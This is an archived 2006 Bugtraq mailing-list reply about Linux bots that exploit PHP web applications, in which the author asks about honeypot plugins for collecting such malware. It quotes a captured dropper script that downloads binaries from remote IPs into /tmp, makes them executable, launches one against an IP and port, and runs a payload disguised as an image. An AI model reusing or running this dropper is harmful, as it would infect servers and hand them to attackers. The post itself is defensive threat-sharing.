lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <17b0fcab0602221200w39fcd18v@mail.gmail.com>
Date: Thu, 23 Feb 2006 09:00:13 +1300
From: "Jamie Riden" <jamie.riden@...il.com>
To: "Gadi Evron" <ge@...uxbox.org>
Cc: bugtraq@...urityfocus.com
Subject: Re: new linux malware


On 21/02/06, Gadi Evron <ge@...uxbox.org> wrote:
>
> Indeed, it has become an annoying trend everybody talks about but nobody
> writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either
> vulnerabilities in know applications such as WordPress, PHPBB, Drupal,
> etc. or actually trying different permutations to attack the site.
<snip>
> Anyone else seeing their web server logs going crazy with new patterns
> every day? Email me, I am starting a sharing system where these can be
> shared mutually so we can better protect ourselves, create signatures, etc.

I got as far as looking at mwcollect and nepenthes to see if anyone
had written plugins to slurp these bots, but couldn't find anything.
Typically they're some sort of variant on:

#!/bin/bash
cd /tmp
wget xxx.yy.105.36/ping
mv ping cb
chmod +x cb
./cb xxx.yyy.233.251 8080 &
killall -9 lordnikonz
wget xxxx052101/images/logo.jpg
mv logo.jpg httpd
rm -rf scripz
chmod +x httpd
export PATH="."
httpd

with payloads being variously identified as Kaiten, Linux.RST and
Lupii by Symantec AV. This is just stuff trying the old awstats
exploit, I haven't coded up any handlers for the xml-rpc, or other
exploits.

So - any handlers/plugins for these? And if so, is anyone (respectable
:) collecting the malware?

cheers,
 Jamie


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ